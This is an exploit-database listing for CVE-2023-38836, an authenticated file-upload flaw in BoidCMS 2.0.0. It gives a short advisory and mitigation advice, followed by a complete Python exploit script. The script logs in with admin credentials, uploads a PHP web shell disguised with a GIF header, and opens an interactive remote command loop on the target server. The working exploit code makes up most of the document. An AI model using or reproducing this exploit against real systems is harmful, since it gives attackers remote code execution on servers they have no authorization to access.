header-logo
Suggest Exploit
vendor:
BoidCMS
by:
1337kid
7.1
CVSS
HIGH
authenticated file upload vulnerability
434
CWE
Product Name: BoidCMS
Affected Version From: <= 2.0.0
Affected Version To:
Patch Exists: NO
Related CWE: CVE-2023-38836
CPE: a:boidcms:boidcms:2.0.0
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu
2023

BoidCMS v2.0.0 – authenticated file upload vulnerability

The BoidCMS v2.0.0 allows authenticated users to upload files, which can lead to remote code execution. This vulnerability can be exploited by an attacker with valid admin credentials to upload a malicious PHP shell script and execute arbitrary commands on the server. The vulnerability has been assigned CVE-2023-38836.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a version higher than 2.0.0, if available. Additionally, restrict access to the admin panel to trusted users only and regularly monitor for any unauthorized file uploads.
Source

Exploit-DB raw data:

#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836

import requests
import re
import argparse

parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd

def showhelp():
	print(parser.print_help())
	exit()
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()

with requests.Session() as s:
	req=s.get(f'{base_url}/admin')
	token=re.findall('[a-z0-9]{64}',req.text)
	form_login_data={
		"username":user,
		"password":passwd,
		"login":"Login",
	}
	form_login_data['token']=token
	s.post(f'{base_url}/admin',data=form_login_data)
	#=========== File upload to RCE
	req=s.get(f'{base_url}/admin?page=media')
	token=re.findall('[a-z0-9]{64}',req.text)
	form_upld_data={
		"token":token,
		"upload":"Upload"
	}
	#==== php shell
	php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
	with open('shell.php','w') as f:
		f.writelines(php_code)
	#====
	file = {'file' : open('shell.php','rb')}
	s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
	req=s.get(f'{base_url}/media/shell.php')
	if req.status_code == '404':
		print("Upload failed")
		exit()
	print(f'Shell uploaded to "{base_url}/media/shell.php"')
	while 1:
		cmd=input("cmd >> ")
		if cmd=='exit': exit()
		req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
		print(req.text)

Navigation

Suggest Exploit

Services By CQR